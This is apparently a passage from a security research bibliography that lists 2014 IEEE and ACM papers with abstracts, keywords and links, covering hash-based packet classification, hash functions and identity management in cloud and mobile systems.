    Keywords: (not provided) (ID#:14-2124)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778794&isnumber=4358933
  • Yang Xu; Zhaobo Liu; Zhuoyuan Zhang; Chao, H.J., "High-Throughput and Memory-Efficient Multimatch Packet Classification Based on Distributed and Pipelined Hash Tables," Networking, IEEE/ACM Transactions on , vol.22, no.3, pp.982,995, June 2014. The emergence of new network applications, such as the network intrusion detection system and packet-level accounting, requires packet classification to report all matched rules instead of only the best matched rule. Although several schemes have been proposed recently to address the multimatch packet classification problem, most of them require either huge memory or expensive ternary content addressable memory (TCAM) to store the intermediate data structure, or they suffer from steep performance degradation under certain types of classifiers. In this paper, we decompose the operation of multimatch packet classification from the complicated multidimensional search to several single-dimensional searches, and present an asynchronous pipeline architecture based on a signature tree structure to combine the intermediate results returned from single-dimensional searches. By spreading edges of the signature tree across multiple hash tables at different stages, the pipeline can achieve a high throughput via the interstage parallel access to hash tables. To exploit further intrastage parallelism, two edge-grouping algorithms are designed to evenly divide the edges associated with each stage into multiple work-conserving hash tables. To avoid collisions involved in hash table lookup, a hybrid perfect hash table construction scheme is proposed. Extensive simulation using realistic classifiers and traffic traces shows that the proposed pipeline architecture outperforms HyperCuts and B2PC schemes in classification speed by at least one order of magnitude, while having a similar storage requirement. Particularly, with different types of classifiers of 4K rules, the proposed pipeline architecture is able to achieve a throughput between 26.8 and 93.1 Gb/s using perfect hash tables.
    Keywords: content-addressable storage; cryptography; security of data; signal classification; table lookup; tree data structures; TCAM; asynchronous pipeline architecture; bit rate 26.8 Gbit/s to 93.1 Gbit/s; complicated multidimensional search; distributed hash tables; edge-grouping; hash table lookup; high-throughput multimatch; hybrid perfect hash table construction; intermediate data structure; interstage parallel access; memory-efficient multimatch; multimatch packet classification problem; network intrusion detection; packet-level accounting; pipelined hash tables; signature tree structure; single-dimensional searches ;steep performance degradation; ternary content addressable memory; throughput via ;traffic traces; Encoding; IEEE transactions; Memory management; Pipelines; Power demand; Search engines; Throughput; Hash table; packet classification; signature tree; ternary content addressable memory (TCAM) (ID#:14-2125)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6565409&isnumber=6832672
  • Chi Sing Chum; Changha Jun; Xiaowen Zhang, "Implementation of Randomize-Then-Combine Constructed Hash Function," Wireless and Optical Communication Conference (WOCC), 2014 23rd , vol., no., pp.1,6, 9-10 May 2014. Hash functions, such as SHA (secure hash algorithm) and MD (message digest) families that are built upon Merkle-Damgard construction, suffer many attacks due to the iterative nature of block-by-block message processing. Chum and Zhang [4] proposed a new hash function construction that takes advantage of the randomize-then-combine technique, which was used in the incremental hash functions, to the iterative hash function. In this paper, we implement such hash construction in three ways distinguished by their corresponding padding methods. We conduct the experiment in parallel multi-threaded programming settings. The results show that the speed of proposed hash function is no worse than SHA1.
    Keywords: cryptography ;iterative methods; multi-threading; Merkle-Damgard construction; block-by-block message processing; hash function construction; incremental hash function; iterative hash function; parallel multithreaded programming; randomize-then-combine technique; Educational institutions; Message systems; Programming; Random access memory; Resistance; Vectors; Hash function implementation; incremental hash function; pair block chaining; randomize-then-combine (ID#:14-2126)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839925&isnumber=6839906
  • Pi-Chung Wang, "Scalable Packet Classification for Datacenter Networks," Selected Areas in Communications, IEEE Journal on , vol.32, no.1, pp.124,137, January 2014. The key challenge to a datacenter network is its scalability to handle many customers and their applications. In a datacenter network, packet classification plays an important role in supporting various network services. Previous algorithms store classification rules with the same length combinations in a hash table to simplify the search procedure. The search performance of hash-based algorithms is tied to the number of hash tables. To achieve fast and scalable packet classification, we propose an algorithm, encoded rule expansion, to transform rules into an equivalent set of rules with fewer distinct length combinations, without affecting the classification results. The new algorithm can minimize the storage penalty of transformation and achieve a short search time. In addition, the scheme supports fast incremental updates. Our simulation results show that more than 90% hash tables can be eliminated. The reduction of length combinations leads to an improvement on speed performance of packet classification by an order of magnitude. The results also show that the software implementation of our scheme without using any hardware parallelism can support up to one thousand customer VLANs and one million rules, where each rule consumes less than 60 bytes and each packet classification can be accomplished under 50 memory accesses.
    Keywords: computer centers; firewalls; local area networks; telecommunication network routing; virtual machines; VLAN; classification rules; datacenter networks; encoded rule expansion; hardware parallelism; hash table; length combinations; packet classification; packet forwarding; storage penalty; Data structures; Decision trees; Encoding; Hardware; IP networks ;Indexes; Software; Packet classification; VLANs; datacenter network ;firewalls; packet forwarding; router architectures; scalability (ID#:14-2127)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6689489&isnumber=6689238
  • Kanizo, Y.; Hay, D.; Keslassy, I, "Maximizing the Throughput of Hash Tables in Network Devices with Combined SRAM/DRAM Memory," Parallel and Distributed Systems, IEEE Transactions on, vol. PP, no.99, pp.1, 1, April 2014. Hash tables form a core component of many algorithms as well as network devices. Because of their large size, they often require a combined memory model, in which some of the elements are stored in a fast memory (for example, cache or on-chip SRAM) while others are stored in much slower memory (namely, the main memory or off-chip DRAM). This makes the implementation of real-life hash tables particularly delicate, as a suboptimal choice of the hashing scheme parameters may result in a higher average query time, and therefore in a lower throughput. In this paper, we focus on multiple-choice hash tables. Given the number of choices, we study the tradeoff between the load of a hash table and its average lookup time. The problem is solved by analyzing an equivalent problem: the expected maximum matching size of a random bipartite graph with a fixed left-side vertex degree. Given two choices, we provide exact results for any finite system, and also deduce asymptotic results as the fast memory size increases. In addition, we further consider other variants of this problem and model the impact of several parameters. Finally, we evaluate the performance of our models on Internet backbone traces, and illustrate the impact of the memories speed difference on the choice of parameters. In particular, we show that the common intuition of entirely avoiding slow memory accesses by using highly efficient schemes (namely, with many fast-memory choices) is not always optimal.
    Keywords: Bipartite graph; Internet; Memory management; Performance evaluation; Random access memory; System-on-chip; Throughput (ID#:14-2128)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781627&isnumber=4359390
  • Plesca, Cezar; Morogan, Luciana, "Efficient And Robust Perceptual Hashing Using Log-Polar Image Representation," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,6, 29-31 May 2014. Robust image hashing seeks to transform a given input image into a shorter hashed version using a key-dependent non-invertible transform. These hashes find extensive applications in content authentication, image indexing for database search and watermarking. Modern robust hashing algorithms consist of feature extraction, a randomization stage to introduce non-invertibility, followed by quantization and binary encoding to produce a binary hash. This paper describes a novel algorithm for generating an image hash based on Log-Polar transform features. The Log-Polar transform is a part of the Fourier-Mellin transformation, often used in image recognition and registration techniques due to its invariant properties to geometric operations. First, we show that the proposed perceptual hash is resistant to content-preserving operations like compression, noise addition, moderate geometric and filtering. Second, we illustrate the discriminative capability of our hash in order to rapidly distinguish between two perceptually different images. Third, we study the security of our method for image authentication purposes. Finally, we show that the proposed hashing method can provide both excellent security and robustness.
    Keywords: image authentication; log-polar transformation; multimedia security; perceptual hashing (ID#:14-2129)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866755&isnumber=6866648
  • Jin, Z.; Li, C.; Lin, Y.; Cai, D., "Density Sensitive Hashing," Cybernetics, IEEE Transactions on , vol. 44, no.8, pp.1362,1371, Aug. 2014. Nearest neighbor search is a fundamental problem in various research fields like machine learning, data mining and pattern recognition. Recently, hashing-based approaches, for example, locality sensitive hashing (LSH), are proved to be effective for scalable high dimensional nearest neighbor search. Many hashing algorithms found their theoretic root in random projection. Since these algorithms generate the hash tables (projections) randomly, a large number of hash tables (i.e., long codewords) are required in order to achieve both high precision and recall. To address this limitation, we propose a novel hashing algorithm called density sensitive hashing (DSH) in this paper. DSH can be regarded as an extension of LSH. By exploring the geometric structure of the data, DSH avoids the purely random projections selection and uses those projective functions which best agree with the distribution of the data. Extensive experimental results on real-world data sets have shown that the proposed method achieves better performance compared to the state-of-the-art hashing approaches.
    Keywords: Binary codes; Databases; Entropy; Nearest neighbor searches; Principal component analysis; Quantization (signal); Vectors; Clustering; locality sensitive hashing; random projection (ID#:14-2130)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645383&isnumber=6856256

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Identity Management

Identity Management


The term identity management refers to the management of individual identities, their roles, authentication, authorizations and privileges within or across systems. Examples include passwords, active directories, digital identities, tokens, and workflows. One of the core competencies for cybersecurity, the increasingly complex IT world demands smarter identity management solutions. The research presented here was published in the first half of 2014.

  • Talamo, Maurizio; Barchiesi, Maria Laura; Merella, Daniela; Schunck, Christian H., "Global Convergence In Digital Identity And Attribute Management: Emerging Needs For Standardization," ITU Kaleidoscope Academic Conference: Living in a converged world - Impossible without standards?, Proceedings of the 2014 , vol., no., pp.15,21, 3-5 June 2014. doi: 10.1109 In a converging world, where borders between countries are surpassed in the digital environment, it is necessary to develop systems that effectively replace the recognition "vis-avis" with digital means of recognizing and identifying entities and people. In this work we summarize the current standardization efforts in the area of digital identity management. We identify a number of open challenges that need to be addressed in the near future to ensure the interoperability and usability of digital identity management services in an efficient and privacy maintaining international framework. These challenges for standardization include: the management of identifiers for digital identities at the global level; attribute management including attribute format, structure, and assurance; procedures and protocols to link attributes to digital identities. Attention is drawn to key elements that should be considered in addressing these issues through standardization.
    Keywords: Authentication; Context; Educational institutions; Privacy; Standards ;attribute management; authentication; authorization; digital identification ;identity management; privacy (ID#:14-2131)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6858475&isnumber=6858455
  • Josang, A, "Identity Management And Trusted Interaction In Internet And Mobile Computing," Information Security, IET , vol.8, no.2, pp.67,79, March 2014. doi: 10.1049 The convergence of the Internet and mobile computing enables personalised access to online services anywhere and anytime. This potent access capability creates opportunities for new business models which stimulates vigorous investment and rapid innovation. Unfortunately, this innovation also produces new vulnerabilities and threats, and the new business models also create incentives for attacks, because criminals will always follow the money. Unless the new threats are balanced with appropriate countermeasures, growth in the Internet and mobile services will encounter painful setbacks. Security and trust are two fundamental factors for sustainable development of identity management in online markets and communities. The aim of this study is to present an overview of the central aspects of identity management in the Internet and mobile computing with respect to security and trust.
    Keywords: Internet; computer crime; investment; marketing data processing; mobile computing; security of data ;trusted computing; Internet; business models; identity management; investment; mobile computing; mobile services; online markets; online services; potent access capability; security; sustainable development; trusted interaction (ID#:14-2132)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748541&isnumber=6748540
  • Faraji, M.; Joon-Myung Kang; Bannazadeh, H.; Leon-Garcia, A, "Identity Access Management For Multi-Tier Cloud Infrastructures," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. doi: 10.1109/NOMS.2014.6838229. This paper presents a novel architecture to manage identity and access (IAM) in a Multi-tier cloud infrastructure, in which most services are supported by massive-scale data centers over the Internet. Multi-tier cloud infrastructure uses tier-based model from Software Engineering to provide resources in different tires. In this paper we focus on design and implementation of a centralized identity and access management system for the multi-tier cloud infrastructure. First, we discuss identity and access management requirements in such an environment and propose our solution to address these requirements. Next, we discuss approaches to improve performance of the IAM system and make it scalable to billions of users. Finally, we present experimental results based on the current deployment in the SAVI Testbed. We show that our IAM system outperforms the previously proposed IAM systems for cloud infrastructure by factor 9 in throughput when the number of users is small, it handle about 50 times more requests in peak usage. Because our architecture is a combination of Green-thread and load balanced process, it uses less systems resources, and easily scales up to address high number of requests.
    Keywords: authorisation; cloud computing ;IAM system; centralized identity access management; green-thread process; load balanced process; multitier cloud infrastructures; Authentication; Authorization; Cloud computing; Computer architecture (ID#:14-2133)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838229&isnumber=6838210
  • Khatri, P., "Using Identity And Trust With Key Management For Achieving Security In Ad Hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.271,275, 21-22 Feb. 2014. doi: 10.1109/IAdCC.2014.6779333 Communication in Mobile Ad hoc network is done over a shared wireless channel with no Central Authority (CA) to monitor. Responsibility of maintaining the integrity and secrecy of data, nodes in the network are held responsible. To attain the goal of trusted communication in MANET (Mobile Ad hoc Network) lot of approaches using key management has been implemented. This work proposes a composite identity and trust based model (CIDT) which depends on public key, physical identity, and trust of a node which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. Trust Factor of a node along with its key pair and identity is used to authenticate a node in the network. Experience based trust factor (TF) of a node is used to decide the authenticity of a node. A valid certificate is generated for authentic node to carry out the communication in the network. Proposed method works well for self certification scheme of a node in the network.
    Keywords: data communication; mobile ad hoc networks; routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network; modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor; trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model (ID#:14-2134)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283
  • Pura, Mihai Lica; Buchs, Didier, "A Self-Organized Key Management Scheme For Ad Hoc Networks Based On Identity-Based Cryptography," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866683 Ad hoc networks represent a very modern technology for providing communication between devices without the need of any prior infrastructure set up, and thus in an "on the spot" manner. But there is a catch: so far there isn't any security scheme that would suit the ad hoc properties of this type of networks and that would also accomplish the needed security objectives. The most promising proposals are the self-organized schemes. This paper presents a work in progress aiming at developing a new self-organized key management scheme that uses identity based cryptography for making impossible some of the attacks that can be performed over the schemes proposed so far, while preserving their advantages. The paper starts with a survey of the most important self-organized key management schemes and a short analysis of the advantages and disadvantages they have. Then, it presents our new scheme, and by using informal analysis, it presents the advantages it has over the other proposals.
    Keywords: ad hoc networks; identity based cryptography; key management; security; self-organization (ID#:14-2135)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866683&isnumber=6866648
  • Kobayashi, F.; Talburt, J.R., "Decoupling Identity Resolution from the Maintenance of Identity Information," Information Technology: New Generations (ITNG), 2014 11th International Conference on, vol., no., pp.349, 354, 7-9 April 2014. doi: 10.1109/ITNG.2014.88 The EIIM model for ER allows for creation and maintenance of persistent entity identity structures. It accomplishes this through a collection of batch configurations that allow updates and asserted fixes to be made to the Identity knowledgebase (IKB). The model also provides a batch IR configuration that provides no maintenance activity but instead allows access to the identity information. This batch IR configuration is limited in a few ways. It is driven by the same rules used for maintaining the IKB, has no inherent method to identity "close" matches, and can only identify and return the positive matches. Through the decoupling of this configuration and its movements into an interactive role under the umbrella of an Identity Management Service, a more robust access method can be provided for the use of identity information. This more robust access to the information improved the quality of the information along multiple Information Quality dimensions.
    Keywords: information retrieval; knowledge based systems; quality management; EIIM model; ER; IKB; batch IR configuration; decoupling identity resolution; entity identity structures; identity information ;identity knowledge base; identity management service; information quality; robust information access; Context; Erbium; Maintenance engineering; Organizations; Robustness; Synchronization; Entity Resolution; identity Life Cycle Management; Identity Management Service; Information Quality; Interactive Identity Resolution (ID#:14-2136)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822222&isnumber=6822158
  • Ahmad, A; Hassan, M.M.; Aziz, A, "A Multi-token Authorization Strategy for Secure Mobile Cloud Computing," Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2014 2nd IEEE International Conference on , vol., no., pp.136,141, 8-11 April 2014. doi: 10.1109/MobileCloud.2014.21 Cloud computing is an emerging paradigm shifting the shape of computing models from being a technology to a utility. However, security, privacy and trust are amongst the issues that can subvert the benefits and hence wide deployment of cloud computing. With the introduction of omnipresent mobile-based clients, the ubiquity of the model increases, suggesting a still higher integration in life. Nonetheless, the security issues rise to a higher degree as well. The constrained input methods for credentials and the vulnerable wireless communication links are among factors giving rise to serious security issues. To strengthen the access control of cloud resources, organizations now commonly acquire Identity Management Systems (IdM). This paper presents that the most popular IdM, namely OAuth, working in scope of Mobile Cloud Computing has many weaknesses in authorization architecture. In particular, authors find two major issues in current IdM. First, if the IdM System is compromised through malicious code, it allows a hacker to get authorization of all the protected resources hosted on a cloud. Second, all the communication links among client, cloud and IdM carries complete authorization token, that can allow hacker, through traffic interception at any communication link, an illegitimate access of protected resources. We also suggest a solution to the reported problems, and justify our arguments with experimentation and mathematical modeling.
    Keywords: authorization; cloud computing; data privacy; mathematical analysis; mobile computing; radio links; security of data; IdM; OAuth; access control; authorization architecture; cloud resources; computing models; credentials; hacker; identity management systems; malicious code; mathematical modeling; multitoken authorization strategy; omnipresent mobile-based clients; privacy; secure mobile cloud computing; security; traffic interception; trust; vulnerable wireless communication links; Authorization; Cloud computing; Computer hacking; Mobile communication; Organizations; Servers; Cloud Computing Security; Identity Management System; Mobile Cloud Computing; Modified Identity Management System; Secure Mobile Computing (ID#:14-2137)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834955&isnumber=6823830
  • Musgrove, J.; Cukic, B.; Cortellessa, V., "Proactive Model-Based Performance Analysis and Security Tradeoffs in a Complex System," High-Assurance Systems Engineering (HASE), 2014 IEEE 15th International Symposium on , vol., no., pp.211,215, 9-11 Jan. 2014. doi: 10.1109/HASE.2014.37 Application domains in which early performance evaluation is needed are becoming more complex. In addition to traditional measures of complexity due, for example, to the number of components, their interactions, complicated control coordination and schemes, emerging applications may require adaptive response and reconfiguration the impact of externally observable (security) parameters. In this paper we introduce an approach for effective modeling and analysis of performance and security tradeoffs. The approach identifies a suitable allocation of resources that meet performance requirements, while maximizing measurable security effects. We demonstrate this approach through the analysis of performance sensitivity of a Border Inspection Management System (BIMS) with changing security mechanisms (e.g. biometric system parameters for passenger identification). The final result is a model-based approach that allows us to take decisions about BIMS performance and security mechanisms on the basis of rates of traveler arrivals and traveler identification security guarantees. We describe the experience gained when applying this approach to daily flight arrival schedule of a real airport.
    Keywords: resource allocation; security of data; sensitivity analysis; BIMS; border inspection management system; complex system; complicated control coordination; early performance evaluation; externally observable security parameters; measurable security effect maximization; model-based approach; performance sensitivity analysis; proactive model-based performance analysis; resource allocation; security tradeoff mechanisms; traveler arrival rate; traveler identification security guarantees; Airports; Analytical models; Atmospheric modeling; Biological system modeling; Inspection; Magnetic resonance; Security; Border security; Identity management; Performance - security tradeoff; Performance modeling (ID#:14-2138)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6754608&isnumber=6754569
  • Ching-Kun Chen; Chun-Liang Lin; Shyan-Lung Lin; Yen-Ming Chiu; Cheng-Tang Chiang, "A Chaotic Theoretical Approach to ECG-Based Identity Recognition [Application Notes]," Computational Intelligence Magazine, IEEE , vol.9, no.1, pp.53,63, Feb. 2014. doi: 10.1109/MCI.2013.2291691 Sophisticated technologies realized from applying the idea of biometric identification are increasingly applied in the entrance security management system, private document protection, and security access control. Common biometric identification involves voice, attitude, keystroke, signature, iris, face, palm or finger prints, etc. Still, there are novel identification technologies based on the individual's biometric features under development .
    Keywords: {biometrics (access control);chaos; electrocardiography; pattern recognition; ECG-based identity recognition; biometric features; biometric identification; chaotic theoretical approach; electrocardiography; entrance security management system; private document protection; security access control; Access control; Biomedical monitoring ;Biometrics; Electrocardiography; Fingerprint recognition; Identity management (ID#:14-2139)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6710250&isnumber=6710231
  • Slomovic, A, "Privacy Issues in Identity Verification," Security & Privacy, IEEE , vol.12, no.3, pp.71,73, May-June 2014. doi: 10.1109/MSP.2014.52 Identity verification plays an important role in creating trust in the economic system. It can, and should, be done in a way that doesn't decrease individual privacy. This article explores privacy issues in identity verification for commercial applications. It does not explore questions about when and to what degree identity verification is needed or address broader issues related to national or other wide-scale identity systems.
    Keywords: business data processing; data privacy; commercial applications; economic system; identity verification; national identity systems; privacy issues; trust creation; wide-scale identity systems; Biometrics (access control);Computer security; Data privacy; Identification; Identity management; Knowledge management; Verification; KBA; biometrics; identity credential; identity document fraud; identity document security; identity fraud; identity proofing; identity scoring; identity verification; imposter fraud; knowledge-based authentication; privacy (ID#:14-2140)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6837386&isnumber=6824513
  • Adjei, J.K., "Explaining the Role of Trust in Cloud Service Acquisition," Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2014 2nd IEEE International Conference on , vol., no., pp.283,288, 8-11 April 2014. doi: 10.1109/MobileCloud.2014.48 Effective digital identity management system is a critical enabler of cloud computing, since it supports the provision of the required assurances to the transacting parties. Such assurances sometimes require the disclosure of sensitive personal information. Given the prevalence of various forms of identity abuses on the Internet, a re-examination of the factors underlying cloud services acquisition has become critical and imperative. In order to provide better assurances, parties to cloud transactions must have confidence in service providers' ability and integrity in protecting their interest and personal information. Thus a trusted cloud identity ecosystem could promote such user confidence and assurances. Using a qualitative research approach, this paper explains the role of trust in cloud service acquisition by organizations. The paper focuses on the processes of acquisition of cloud services by financial institutions in Ghana. The study forms part of comprehensive study on the monetization of personal Identity information.
    Keywords: cloud computing; data protection; trusted computing; Ghana; Internet; cloud computing; cloud services acquisition; cloud transactions; digital identity management system; financial institutions; identity abuses; interest protection; organizations; personal identity information; sensitive personal information; service provider ability; service provider integrity; transacting parties; trusted cloud identity ecosystem; user assurances; user confidence; Banking; Cloud computing; Context; Law; Organizations; Privacy; cloud computing; information privacy; mediating; trust (ID#:14-2141)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834977&isnumber=6823830
  • Albino Pereira, A; Bosco M.Sobral, J.; Merkle Westphall, C., "Towards Scalability for Federated Identity Systems for Cloud-Based Environments," New Technologies, Mobility and Security (NTMS), 2014 6th International Conference on , vol., no., pp.1,5, March 30 2014-April 2 2014. doi: 10.1109/NTMS.2014.6814055 As multi-tenant authorization and federated identity management systems for cloud computing matures, the provisioning of services using this paradigm allows maximum efficiency on business that requires access control. However, regarding scalability support, mainly horizontal, some characteristics of those approaches based on central authentication protocols are problematic. The objective of this work is to address these issues by providing an adapted sticky-session mechanism for a Shibboleth architecture using CAS. This alternative, compared with the recommended shared memory approach, shown improved efficiency and less overall infrastructure complexity.
    Keywords: authorization; cloud computing; cryptographic protocols; CAS; Shibboleth architecture; central authentication protocols; central authentication service; cloud based environments; cloud computing; federated identity management systems; federated identity system scalability; multitenant authorization; sticky session mechanism; Authentication; Cloud computing; Proposals; Scalability; Servers; Virtual machining (ID#:14-2142)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814055&isnumber=6813963
  • Friese, I; Heuer, J.; Ning Kong, "Challenges from the Identities of Things: Introduction of the Identities of Things discussion group within Kantara initiative," Internet of Things (WF-IoT), 2014 IEEE World Forum on , vol., no., pp.1,4, 6-8 March 2014. doi: 10.1109/WF-IoT.2014.6803106 The Internet of Things (IoT) becomes reality. But its restrictions become obvious as we try to connect solutions of different vendors and communities. Apart from communication protocols appropriate identity management mechanisms are crucial for a growing IoT. The recently founded Identities of Things Discussion Group within Kantara Initiative will work on open issues and solutions to manage "Identities of Things" as an enabler for a fast-growing ecosystem.
    Keywords: Internet of Things; authorisation; data privacy; Identities of Things discussion group; Internet of Things ;IoT; Kantara Initiative; authentication; authorization; communication protocols; data privacy; identity management mechanisms; Authentication; Authorization; Companies; Internet; Object recognition; Protocols; Sensors; Kantara Initiative; authentication; authorization; identifier; identity; name service; privacy (ID#:14-2143)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6803106&isnumber=6803102
  • Ben Bouazza, N.; Lemoudden, M.; El Ouahidi, B., "Surveying the Challenges And Requirements For Identity In The Cloud," Security Days (JNS4), Proceedings of the 4th Edition of National , vol., no., pp.1,5, 12-13 May 2014. doi: 10.1109/JNS4.2014.6850127 Cloud technologies are increasingly important for IT department for allowing them to concentrate on strategy as opposed to maintaining data centers; the biggest advantages of the cloud is the ability to share computing resources between multiple providers, especially hybrid clouds, in overcoming infrastructure limitations. User identity federation is considered as the second major risk in the cloud, and since business organizations use multiple cloud service providers, IT department faces a range of constraints. Multiple attempts to solve this problem have been suggested like federated Identity, which has a number of advantages, despite it suffering from challenges that are common in new technologies. The following paper tackles federated identity, its components, advantages, disadvantages, and then proposes a number of useful scenarios to manage identity in hybrid clouds infrastructure.
    Keywords: cloud computing; security of data; business organizations; cloud service providers ;cloud technologies; computing resource sharing; data centers; federated identity management; hybrid clouds; user identity federation; Access control; Authentication; Cloud computing; Computational modeling; Computers; Organizations; Access control; Claim; Cloud; Federated identity; Federation provider; Identity provider; SaaS; Security; Token (ID#:14-2144)
    URL: http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6850127&queryText%3DBen+Bouazza
  • Patricia Arias Cabarcos, Florina Almenarez, Felix Gomez Marmol, Andres Marin, "To Federate or Not To Federate: A Reputation-Based Mechanism to Dynamize Cooperation in Identity Management," Wireless Personal Communications: An International Journal, Volume 75 Issue 3, April 2014, Pages 1769-1786. doi>10.1007/s11277-013-1338-y Identity Management systems cannot be centralized anymore. Nowadays, users have multiple accounts, profiles and personal data distributed throughout the web and hosted by different providers. However, the online world is currently divided into identity silos forcing users to deal with repetitive authentication and registration processes and hindering a faster development of large scale e-business. Federation has been proposed as a technology to bridge different trust domains, allowing user identity information to be shared in order to improve usability. But further research is required to shift from the current static model, where manual bilateral agreements must be pre-configured to enable cooperation between unknown parties, to a more dynamic one, where trust relationships are established on demand in a fully automated fashion. This paper presents IdMRep, the first completely decentralized reputation-based mechanism which makes dynamic federation a reality. Initial experiments demonstrate its accuracy as well as an assumable overhead in scenarios with and without malicious nodes.
    Keywords: Cooperative systems, Identity federation, Identity management, Trust and reputation management (ID#:14-2145)
    URL: http://dx.doi.org/10.1007/s11277-013-1338-y or http://dl.acm.org/citation.cfm?id=2598716.2598732&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
  • Zhiwei Wang, Guozi Sun, Danwei Chen, "A New Definition Of Homomorphic Signature For Identity Management In Mobile Cloud Computing," Journal of Computer and System Sciences, Volume 80 Issue 3, May, 2014, Pages 546-553. doi>10.1016/j.jcss.2013.06.010 In this paper, we define a new homomorphic signature for identity management in mobile cloud computing. A mobile user firstly computes a full signature on all his sensitive personal information (SPI), and stores it in a trusted third party (TTP). During the valid period of his full signature, if the user wants to call a cloud service, he should authenticate him to the cloud service provider (CSP) through TTP. In our scheme, the mobile user only needs to send a {0,1}^n vector to the access controlling server (TTP). The access controlling server who doesn@?t know the secret key can compute a partial signature on a small part of user@?s SPI, and then sends it to the CSP. We give a formal secure definition of this homomorphic signature, and construct a scheme from GHR signature. We prove that our scheme is secure under GHR signature.
    Keywords: GHR signature, Homomorphic signature, Identity management, Mobile cloud computing (ID#:14-2146)
    URL: http://dx.doi.org/10.1016/j.jcss.2013.06.010 or http://dl.acm.org/citation.cfm?id=2567015.2567375&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
  • Nathaniel J. Fuller / Maxine S. Cohen, "A Contextual Model For Identity Management (IDM) Interfaces," Doctoral Dissertation, Nova Southeastern University (c)2014, ISBN: 978-1-303-76101-0. The usability of Identity Management (IdM) systems is highly dependent upon design that simplifies the processes of identification, authentication, and authorization. Recent findings reveal two critical problems that degrade IdM usability: (1) unfeasible techniques for managing various digital identifiers, and (2) ambiguous security interfaces. The rapid growth of online services consisting of various identifier concepts and indistinct designs overwhelm users and disrupt desired computing activities. These complexities have led to an increase in work operations and additional effort for end users. This work focused on these challenges towards developing a contextual model that enhanced IdM usability. The context of this model provided users with preapproved identification and technical features for managing digital identifiers. A sample population of military and government participants were surveyed to capture their relative computing characteristics and end user requirements for IdM and identifiers. Characteristics, such as Ease of Access Management, Cognitive Overload, Identifier Selection, Confidentiality, and Trust were recorded and measured by means of their frequency of occurrence. A standard deviation was utilized for assessing the volatility of the results. Conclusive results were successfully integrated into an attribute-based architecture so that the contextual model's algorithm, which was the contribution of this work, could be utilized for interpreting requirement attributes for defining end user IdM parameters for business applications. Usability inspection results illustrated that the model's algorithm was able to reduce cognitive overloads and disruptions in workflow by limiting recognition, recall, and convenience values of end users.
    Keywords: (not provided) (ID#:14-2147)
    URL: http://dl.acm.org/citation.cfm?id=2604216&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367
  • V. Neelaya Dhatchayani, V.S. Shankar Sriram, "Trust Aware Identity Management for Cloud Computing," International Journal of Information and Communication Technology, Volume 6 Issue 3/4, July 2014, Pages 369-380. doi>10.1504/IJICT.2014.063220 Today, companies across the world are adopting cloud services for efficient and cost effective resource management. However, cloud computing is still in developing stage where there are lots of research problems yet to be solved. One such area is security which addresses issues like privacy, identity management, and trust management among other things. As of now, there exists no standard identity management system for a cloud environment. The aspect of trusted propagation still needs to be tackled. This research work proposes a trusted security architecture for cloud identity management that can dynamically federate user identities. The trust architecture proposed use Bayesian inference and roulette wheel selection technique to evaluate trust scores. Using the proposed trust model, dynamic trust relationships are formed across multiple cloud service providers and identity providers thereby eliminating fragmentation of user identities. The trust model was implemented and tested in Google App Engine. The performance of the trust measures was analysed.
    Keywords: (not provided) (ID#:14-2148)
    URL: http://dx.doi.org/10.1504/IJICT.2014.063220 or http://dl.acm.org/citation.cfm?id=2648896.2648906&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367

Note:

